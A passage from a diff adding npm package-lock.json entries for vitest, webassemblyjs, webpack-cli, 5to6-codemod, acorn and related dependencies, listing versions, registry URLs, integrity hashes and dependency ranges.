"sha512-h8k+1oWHfwTkyTkb9egzwNMfJAEx4veaPSnMeKbVSjp4euqGSbQlm5+6VHwTr7u4FJslVVsUG5nopCaAYdOmSQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/expect/node_modules/@vitest/utils": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@vitest/utils/-/utils-2.0.5.tgz", + "integrity": "sha512-d8HKbqIcya+GR67mkZbrzhS5kKhtp8dQLcmRZLGTscGVg7yImT82cIrhtn2L8+VujWcy6KZweApgNmPsTAO/UQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/pretty-format": "2.0.5", + "estree-walker": "^3.0.3", + "loupe": "^3.1.1", + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/expect/node_modules/assertion-error": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/assertion-error/-/assertion-error-2.0.1.tgz", + "integrity": "sha512-Izi8RQcffqCeNVgFigKli1ssklIbpHnCYc6AknXGYoB6grJqyeby7jv12JUQgmTAnIDnbck1uxksT4dzN3PWBA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + } + }, + "node_modules/@vitest/expect/node_modules/chai": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/chai/-/chai-5.2.0.tgz", + "integrity": "sha512-mCuXncKXk5iCLhfhwTc0izo0gtEmpz5CtG2y8GiOINBlMVS6v8TMRc5TaLWKS6692m9+dVVfzgeVxR5UxWHTYw==", + "dev": true, + "license": "MIT", + "dependencies": { + "assertion-error": "^2.0.1", + "check-error": "^2.1.1", + "deep-eql": "^5.0.1", + "loupe": "^3.1.0", + "pathval": "^2.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@vitest/expect/node_modules/check-error": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/check-error/-/check-error-2.1.1.tgz", + "integrity": "sha512-OAlb+T7V4Op9OwdkjmguYRqncdlx5JiofwOAUkmTF+jNdHwzTaTs4sRAGpzLF3oOz5xAyDGrPgeIDFQmDOTiJw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 16" + } + }, + "node_modules/@vitest/expect/node_modules/deep-eql": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-5.0.2.tgz", + "integrity": "sha512-h5k/5U50IJJFpzfL6nO9jaaumfjO/f2NjK/oYB2Djzm4p9L+3T9qWpZqZ2hAbLPuuYq9wrU08WQyBTL5GbPk5Q==", + "dev": true, + 
"license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/@vitest/expect/node_modules/loupe": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/loupe/-/loupe-3.1.3.tgz", + "integrity": "sha512-kkIp7XSkP78ZxJEsSxW3712C6teJVoeHHwgo9zJ380de7IYyJ2ISlxojcH2pC5OFLewESmnRi/+XCDIEEVyoug==", + "dev": true, + "license": "MIT" + }, + "node_modules/@vitest/expect/node_modules/pathval": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/pathval/-/pathval-2.0.0.tgz", + "integrity": "sha512-vE7JKRyES09KiunauX7nd2Q9/L7lhok4smP9RZTDeD4MVs72Dp2qNFVz39Nz5a0FVEW0BJR6C0DYrq6unoziZA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 14.16" + } + }, + "node_modules/@vitest/pretty-format": { + "version": "2.1.9", + "resolved": "https://registry.npmjs.org/@vitest/pretty-format/-/pretty-format-2.1.9.tgz", + "integrity": "sha512-KhRIdGV2U9HOUzxfiHmY8IFHTdqtOhIzCpd8WRdJiE7D/HUcZVD0EgQCVjm+Q9gkUXWgBvMmTtZgIG48wq7sOQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/spy": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@vitest/spy/-/spy-2.0.5.tgz", + "integrity": "sha512-c/jdthAhvJdpfVuaexSrnawxZz6pywlTPe84LUB2m/4t3rl2fTo9NFGBG4oWgaD+FTgDDV8hJ/nibT7IfH3JfA==", + "dev": true, + "license": "MIT", + "dependencies": { + "tinyspy": "^3.0.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/utils": { + "version": "2.1.9", + "resolved": "https://registry.npmjs.org/@vitest/utils/-/utils-2.1.9.tgz", + "integrity": "sha512-v0psaMSkNJ3A2NMrUEHFRzJtDPFn+/VWZ5WxImB21T9fjucJRmS7xCS3ppEnARb9y11OAzaD+P2Ps+b+BGX5iQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/pretty-format": "2.1.9", + "loupe": "^3.1.2", + "tinyrainbow": "^1.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/utils/node_modules/loupe": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/loupe/-/loupe-3.1.3.tgz", + "integrity": "sha512-kkIp7XSkP78ZxJEsSxW3712C6teJVoeHHwgo9zJ380de7IYyJ2ISlxojcH2pC5OFLewESmnRi/+XCDIEEVyoug==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/ast": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/ast/-/ast-1.14.1.tgz", + "integrity": "sha512-nuBEDgQfm1ccRp/8bCQrx1frohyufl4JlbMMZ4P1wpeOfDhF6FQkxZJ1b/e+PLwr6X1Nhw6OLme5usuBWYBvuQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/helper-numbers": "1.13.2", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2" + } + }, + "node_modules/@webassemblyjs/floating-point-hex-parser": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/floating-point-hex-parser/-/floating-point-hex-parser-1.13.2.tgz", + "integrity": "sha512-6oXyTOzbKxGH4steLbLNOu71Oj+C8Lg34n6CqRvqfS2O71BxY6ByfMDRhBytzknj9yGUPVJ1qIKhRlAwO1AovA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/helper-api-error": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-api-error/-/helper-api-error-1.13.2.tgz", + "integrity": "sha512-U56GMYxy4ZQCbDZd6JuvvNV/WFildOjsaWD3Tzzvmw/mas3cXzRJPMjP83JqEsgSbyrmaGjBfDtV7KDXV9UzFQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/helper-buffer": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-buffer/-/helper-buffer-1.14.1.tgz", + 
"integrity": "sha512-jyH7wtcHiKssDtFPRB+iQdxlDf96m0E39yb0k5uJVhFGleZFoNw1c4aeIcVUPPbXUVJ94wwnMOAqUHyzoEPVMA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/helper-numbers": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-numbers/-/helper-numbers-1.13.2.tgz", + "integrity": "sha512-FE8aCmS5Q6eQYcV3gI35O4J789wlQA+7JrqTTpJqn5emA4U2hvwJmvFRC0HODS+3Ye6WioDklgd6scJ3+PLnEA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/floating-point-hex-parser": "1.13.2", + "@webassemblyjs/helper-api-error": "1.13.2", + "@xtuc/long": "4.2.2" + } + }, + "node_modules/@webassemblyjs/helper-wasm-bytecode": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-wasm-bytecode/-/helper-wasm-bytecode-1.13.2.tgz", + "integrity": "sha512-3QbLKy93F0EAIXLh0ogEVR6rOubA9AoZ+WRYhNbFyuB70j3dRdwH9g+qXhLAO0kiYGlg3TxDV+I4rQTr/YNXkA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/helper-wasm-section": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/helper-wasm-section/-/helper-wasm-section-1.14.1.tgz", + "integrity": "sha512-ds5mXEqTJ6oxRoqjhWDU83OgzAYjwsCV8Lo/N+oRsNDmx/ZDpqalmrtgOMkHwxsG0iI//3BwWAErYRHtgn0dZw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-buffer": "1.14.1", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2", + "@webassemblyjs/wasm-gen": "1.14.1" + } + }, + "node_modules/@webassemblyjs/ieee754": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/ieee754/-/ieee754-1.13.2.tgz", + "integrity": "sha512-4LtOzh58S/5lX4ITKxnAK2USuNEvpdVV9AlgGQb8rJDHaLeHciwG4zlGr0j/SNWlr7x3vO1lDEsuePvtcDNCkw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@xtuc/ieee754": "^1.2.0" + } + }, + "node_modules/@webassemblyjs/leb128": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/leb128/-/leb128-1.13.2.tgz", + "integrity": "sha512-Lde1oNoIdzVzdkNEAWZ1dZ5orIbff80YPdHx20mrHwHrVNNTjNr8E3xz9BdpcGqRQbAEa+fkrCb+fRFTl/6sQw==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@xtuc/long": "4.2.2" + } + }, + "node_modules/@webassemblyjs/utf8": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@webassemblyjs/utf8/-/utf8-1.13.2.tgz", + "integrity": "sha512-3NQWGjKTASY1xV5m7Hr0iPeXD9+RDobLll3T9d2AO+g3my8xy5peVyjSag4I50mR1bBSN/Ct12lo+R9tJk0NZQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@webassemblyjs/wasm-edit": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wasm-edit/-/wasm-edit-1.14.1.tgz", + "integrity": "sha512-RNJUIQH/J8iA/1NzlE4N7KtyZNHi3w7at7hDjvRNm5rcUXa00z1vRz3glZoULfJ5mpvYhLybmVcwcjGrC1pRrQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-buffer": "1.14.1", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2", + "@webassemblyjs/helper-wasm-section": "1.14.1", + "@webassemblyjs/wasm-gen": "1.14.1", + "@webassemblyjs/wasm-opt": "1.14.1", + "@webassemblyjs/wasm-parser": "1.14.1", + "@webassemblyjs/wast-printer": "1.14.1" + } + }, + "node_modules/@webassemblyjs/wasm-gen": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wasm-gen/-/wasm-gen-1.14.1.tgz", + "integrity": "sha512-AmomSIjP8ZbfGQhumkNvgC33AY7qtMCXnN6bL2u2Js4gVCg8fp735aEiMSBbDR7UQIj90n4wKAFUSEd0QN2Ukg==", + "dev": true, + "license": "MIT", + "dependencies": { + 
"@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2", + "@webassemblyjs/ieee754": "1.13.2", + "@webassemblyjs/leb128": "1.13.2", + "@webassemblyjs/utf8": "1.13.2" + } + }, + "node_modules/@webassemblyjs/wasm-opt": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wasm-opt/-/wasm-opt-1.14.1.tgz", + "integrity": "sha512-PTcKLUNvBqnY2U6E5bdOQcSM+oVP/PmrDY9NzowJjislEjwP/C4an2303MCVS2Mg9d3AJpIGdUFIQQWbPds0Sw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-buffer": "1.14.1", + "@webassemblyjs/wasm-gen": "1.14.1", + "@webassemblyjs/wasm-parser": "1.14.1" + } + }, + "node_modules/@webassemblyjs/wasm-parser": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wasm-parser/-/wasm-parser-1.14.1.tgz", + "integrity": "sha512-JLBl+KZ0R5qB7mCnud/yyX08jWFw5MsoalJ1pQ4EdFlgj9VdXKGuENGsiCIjegI1W7p91rUlcB/LB5yRJKNTcQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-api-error": "1.13.2", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2", + "@webassemblyjs/ieee754": "1.13.2", + "@webassemblyjs/leb128": "1.13.2", + "@webassemblyjs/utf8": "1.13.2" + } + }, + "node_modules/@webassemblyjs/wast-printer": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wast-printer/-/wast-printer-1.14.1.tgz", + "integrity": "sha512-kPSSXE6De1XOR820C90RIo2ogvZG+c3KiHzqUoO/F34Y2shGzesfqv7o57xrxovZJH/MetF5UjroJ/R/3isoiw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@xtuc/long": "4.2.2" + } + }, + "node_modules/@webpack-cli/configtest": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@webpack-cli/configtest/-/configtest-2.1.1.tgz", + "integrity": "sha512-wy0mglZpDSiSS0XHrVR+BAdId2+yxPSoJW8fsna3ZpYSlufjvxnP4YbKTCBZnNIcGN4r6ZPXV55X4mYExOfLmw==", + "dev": true, + "engines": { + "node": ">=14.15.0" + }, + "peerDependencies": { + "webpack": "5.x.x", + "webpack-cli": "5.x.x" + } + }, + "node_modules/@webpack-cli/info": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@webpack-cli/info/-/info-2.0.2.tgz", + "integrity": "sha512-zLHQdI/Qs1UyT5UBdWNqsARasIA+AaF8t+4u2aS2nEpBQh2mWIVb8qAklq0eUENnC5mOItrIB4LiS9xMtph18A==", + "dev": true, + "engines": { + "node": ">=14.15.0" + }, + "peerDependencies": { + "webpack": "5.x.x", + "webpack-cli": "5.x.x" + } + }, + "node_modules/@webpack-cli/serve": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@webpack-cli/serve/-/serve-2.0.5.tgz", + "integrity": "sha512-lqaoKnRYBdo1UgDX8uF24AfGMifWK19TxPmM5FHc2vAGxrJ/qtyUyFBWoY1tISZdelsQ5fBcOusifo5o5wSJxQ==", + "dev": true, + "engines": { + "node": ">=14.15.0" + }, + "peerDependencies": { + "webpack": "5.x.x", + "webpack-cli": "5.x.x" + }, + "peerDependenciesMeta": { + "webpack-dev-server": { + "optional": true + } + } + }, + "node_modules/@xmldom/xmldom": { + "version": "0.7.13", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.7.13.tgz", + "integrity": "sha512-lm2GW5PkosIzccsaZIz7tp8cPADSIlIHWDFTR1N0SzfinhhYgeIQjFMz4rYzanCScr3DqQLeomUDArp6MWKm+g==", + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/@xtuc/ieee754": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@xtuc/ieee754/-/ieee754-1.2.0.tgz", + "integrity": "sha512-DX8nKgqcGwsc0eJSqYt5lwP4DH5FlHnmuWWBRy7X0NcaGR0ZtuyeESgMwTYVEtxmsNGY+qit4QYT/MIYTOTPeA==", + "dev": true, + "license": "BSD-3-Clause" + }, + 
"node_modules/@xtuc/long": { + "version": "4.2.2", + "resolved": "https://registry.npmjs.org/@xtuc/long/-/long-4.2.2.tgz", + "integrity": "sha512-NuHqBY1PB/D8xU6s/thBgOAiAP7HOYDQ32+BFZILJ8ivkUkAHQnWfn6WhL79Owj1qmUnoN/YPhktdIoucipkAQ==", + "dev": true, + "license": "Apache-2.0" + }, + "node_modules/@yarnpkg/lockfile": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@yarnpkg/lockfile/-/lockfile-1.1.0.tgz", + "integrity": "sha512-GpSwvyXOcOOlV70vbnzjj4fW5xW/FdUF6nQEt1ENy7m4ZCczi1+/buVUPAqmGfqznsORNFzUMjctTIp8a9tuCQ==" + }, + "node_modules/5to6-codemod": { + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/5to6-codemod/-/5to6-codemod-1.8.0.tgz", + "integrity": "sha512-RUHjjwl9+p1d46USvmoKsmMaHODFUAESE1de/q0qQM+hwzgk/HssTwb1Nc5dbUpKEkJ7duLg6ggMIwScd+TRig==", + "dev": true, + "dependencies": { + "jscodeshift": "^0.6.3", + "lodash": "^4.17.4", + "recast": "^0.12.1" + } + }, + "node_modules/5to6-codemod/node_modules/ast-types": { + "version": "0.10.1", + "resolved": "https://registry.npmjs.org/ast-types/-/ast-types-0.10.1.tgz", + "integrity": "sha512-UY7+9DPzlJ9VM8eY0b2TUZcZvF+1pO0hzMtAyjBYKhOmnvRlqYNYnWdtsMj0V16CGaMlpL0G1jnLbLo4AyotuQ==", + "dev": true, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/5to6-codemod/node_modules/braces": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/braces/-/braces-2.3.2.tgz", + "integrity": "sha512-aNdbnj9P8PjdXU4ybaWLK2IF3jc/EoDYbC7AazW6to3TRsfXxscC9UXOB5iDiEQrkyIbWp2SLQda4+QAa7nc3w==", + "dev": true, + "dependencies": { + "arr-flatten": "^1.1.0", + "array-unique": "^0.3.2", + "extend-shallow": "^2.0.1", + "fill-range": "^4.0.0", + "isobject": "^3.0.1", + "repeat-element": "^1.1.2", + "snapdragon": "^0.8.1", + "snapdragon-node": "^2.0.1", + "split-string": "^3.0.2", + "to-regex": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/braces/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/core-js": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/core-js/-/core-js-2.6.12.tgz", + "integrity": "sha512-Kb2wC0fvsWfQrgk8HU5lW6U/Lcs8+9aaYcy4ZFc6DDlo4nZ7n70dEgE5rtR0oG6ufKDUnrwfWL1mXR5ljDatrQ==", + "deprecated": "core-js@<3.23.3 is no longer maintained and not recommended for usage due to the number of issues. Because of the V8 engine whims, feature detection in old core-js versions could cause a slowdown up to 100x even if nothing is polyfilled. Some versions have web compatibility issues. 
Please, upgrade your dependencies to the actual version of core-js.", + "dev": true, + "hasInstallScript": true + }, + "node_modules/5to6-codemod/node_modules/fill-range": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-4.0.0.tgz", + "integrity": "sha512-VcpLTWqWDiTerugjj8e3+esbg+skS3M9e54UuR3iCeIDMXCLTsAH8hTSzDQU/X6/6t3eYkOKoZSef2PlU6U1XQ==", + "dev": true, + "dependencies": { + "extend-shallow": "^2.0.1", + "is-number": "^3.0.0", + "repeat-string": "^1.6.1", + "to-regex-range": "^2.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/fill-range/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/is-number": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-3.0.0.tgz", + "integrity": "sha512-4cboCqIpliH+mAvFNegjZQ4kgKc3ZUhQVr3HvWbSh5q3WH2v82ct+T2Y1hdU5Gdtorx/cLifQjqCbL7bpznLTg==", + "dev": true, + "dependencies": { + "kind-of": "^3.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/is-number/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/jscodeshift": { + "version": "0.6.4", + "resolved": "https://registry.npmjs.org/jscodeshift/-/jscodeshift-0.6.4.tgz", + "integrity": "sha512-+NF/tlNbc2WEhXUuc4WEJLsJumF84tnaMUZW2hyJw3jThKKRvsPX4sPJVgO1lPE28z0gNL+gwniLG9d8mYvQCQ==", + "dev": true, + "dependencies": { + "@babel/core": "^7.1.6", + "@babel/parser": "^7.1.6", + "@babel/plugin-proposal-class-properties": "^7.1.0", + "@babel/plugin-proposal-object-rest-spread": "^7.0.0", + "@babel/preset-env": "^7.1.6", + "@babel/preset-flow": "^7.0.0", + "@babel/preset-typescript": "^7.1.0", + "@babel/register": "^7.0.0", + "babel-core": "^7.0.0-bridge.0", + "colors": "^1.1.2", + "flow-parser": "0.*", + "graceful-fs": "^4.1.11", + "micromatch": "^3.1.10", + "neo-async": "^2.5.0", + "node-dir": "^0.1.17", + "recast": "^0.16.1", + "temp": "^0.8.1", + "write-file-atomic": "^2.3.0" + }, + "bin": { + "jscodeshift": "bin/jscodeshift.js" + } + }, + "node_modules/5to6-codemod/node_modules/jscodeshift/node_modules/ast-types": { + "version": "0.11.7", + "resolved": "https://registry.npmjs.org/ast-types/-/ast-types-0.11.7.tgz", + "integrity": "sha512-2mP3TwtkY/aTv5X3ZsMpNAbOnyoC/aMJwJSoaELPkHId0nSQgFcnU4dRW3isxiz7+zBexk0ym3WNVjMiQBnJSw==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/5to6-codemod/node_modules/jscodeshift/node_modules/recast": { + "version": "0.16.2", + "resolved": 
"https://registry.npmjs.org/recast/-/recast-0.16.2.tgz", + "integrity": "sha512-O/7qXi51DPjRVdbrpNzoBQH5dnAPQNbfoOFyRiUwreTMJfIHYOEBzwuH+c0+/BTSJ3CQyKs6ILSWXhESH6Op3A==", + "dev": true, + "dependencies": { + "ast-types": "0.11.7", + "esprima": "~4.0.0", + "private": "~0.1.5", + "source-map": "~0.6.1" + }, + "engines": { + "node": ">= 4" + } + }, + "node_modules/5to6-codemod/node_modules/micromatch": { + "version": "3.1.10", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-3.1.10.tgz", + "integrity": "sha512-MWikgl9n9M3w+bpsY3He8L+w9eF9338xRl8IAO5viDizwSzziFEyUzo2xrrloB64ADbTf8uA8vRqqttDTOmccg==", + "dev": true, + "dependencies": { + "arr-diff": "^4.0.0", + "array-unique": "^0.3.2", + "braces": "^2.3.1", + "define-property": "^2.0.2", + "extend-shallow": "^3.0.2", + "extglob": "^2.0.4", + "fragment-cache": "^0.2.1", + "kind-of": "^6.0.2", + "nanomatch": "^1.2.9", + "object.pick": "^1.3.0", + "regex-not": "^1.0.0", + "snapdragon": "^0.8.1", + "to-regex": "^3.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/recast": { + "version": "0.12.9", + "resolved": "https://registry.npmjs.org/recast/-/recast-0.12.9.tgz", + "integrity": "sha512-y7ANxCWmMW8xLOaiopiRDlyjQ9ajKRENBH+2wjntIbk3A6ZR1+BLQttkmSHMY7Arl+AAZFwJ10grg2T6f1WI8A==", + "dev": true, + "dependencies": { + "ast-types": "0.10.1", + "core-js": "^2.4.1", + "esprima": "~4.0.0", + "private": "~0.1.5", + "source-map": "~0.6.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/5to6-codemod/node_modules/to-regex-range": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-2.1.1.tgz", + "integrity": "sha512-ZZWNfCjUokXXDGXFpZehJIkZqq91BcULFq/Pi7M5i4JnxXdhMKAK682z8bCW3o8Hj1wuuzoKcW3DfVzaP6VuNg==", + "dev": true, + "dependencies": { + "is-number": "^3.0.0", + "repeat-string": "^1.6.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/write-file-atomic": { + "version": "2.4.3", + "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-2.4.3.tgz", + "integrity": "sha512-GaETH5wwsX+GcnzhPgKcKjJ6M2Cq3/iZp1WyY/X1CSqrW+jVNM9Y7D8EC2sM4ZG/V8wZlSniJnCKWPmBYAucRQ==", + "dev": true, + "dependencies": { + "graceful-fs": "^4.1.11", + "imurmurhash": "^0.1.4", + "signal-exit": "^3.0.2" + } + }, + "node_modules/abab": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/abab/-/abab-2.0.6.tgz", + "integrity": "sha512-j2afSsaIENvHZN2B8GOpF566vZ5WVk5opAiMTvWgaQT8DkbOqsTfvNAvHoRGU2zzP8cPoqys+xHTRDWW8L+/BA==", + "dev": true + }, + "node_modules/abbrev": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-1.1.1.tgz", + "integrity": "sha512-nne9/IiQ/hzIhY6pdDnbBtz7DjPTKrY00P/zvPSm5pOFkl6xuGrGnXn/VtTNNfNtAfZ9/1RtehkszU9qcTii0Q==" + }, + "node_modules/abort-controller": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/abort-controller/-/abort-controller-3.0.0.tgz", + "integrity": "sha512-h8lQ8tacZYnR3vNQTgibj+tODHI5/+l06Au2Pcriv/Gmet0eaj4TwWH41sO9wnHDiQsEj19q0drzdWdeAHtweg==", + "dependencies": { + "event-target-shim": "^5.0.0" + }, + "engines": { + "node": ">=6.5" + } + }, + "node_modules/accepts": { + "version": "1.3.8", + "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz", + "integrity": "sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==", + "dependencies": { + "mime-types": "~2.1.34", + "negotiator": "0.6.3" + }, + "engines": { + "node": ">= 0.6" + } + }, + 
"node_modules/acorn": { + "version": "7.4.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-7.4.1.tgz", + "integrity": "sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/acorn-class-fields": { + "version": "0.3.7", + "resolved": "https://registry.npmjs.org/acorn-class-fields/-/acorn-class-fields-0.3.7.tgz", + "integrity": "sha512-jdUWSFce0fuADUljmExz4TWpPkxmRW/ZCPRqeeUzbGf0vFUcpQYbyq52l75qGd0oSwwtAepeL6hgb/naRgvcKQ==", + "dev": true, + "dependencies": { + "acorn-private-class-elements": "^0.2.7" + }, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^6 || ^7 || ^8" + } + }, + "node_modules/acorn-globals": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/acorn-globals/-/acorn-globals-6.0.0.tgz", + "integrity": "sha512-ZQl7LOWaF5ePqqcX4hLuv/bLXYQNfNWw2c0/yX/TsPRKamzHcTGQnlCjHT3TsmkOUVEPS3crCxiPfdzE/Trlhg==", + "dev": true, + "dependencies": { + "acorn": "^7.1.1", + "acorn-walk": "^7.1.1" + } + }, + "node_modules/acorn-jsx": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", + "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", + "peerDependencies": { + "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" + } + }, + "node_modules/acorn-private-class-elements": { + "version": "0.2.7", + "resolved": "https://registry.npmjs.org/acorn-private-class-elements/-/acorn-private-class-elements-0.2.7.tgz", + "integrity": "sha512-+GZH2wOKNZOBI4OOPmzpo4cs6mW297sn6fgIk1dUI08jGjhAaEwvC39mN2gJAg2lmAQJ1rBkFqKWonL3Zz6PVA==", + "dev": true, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^6.1.0 || ^7 || ^8" + } + }, + "node_modules/acorn-private-methods": { + "version": "0.3.3", + 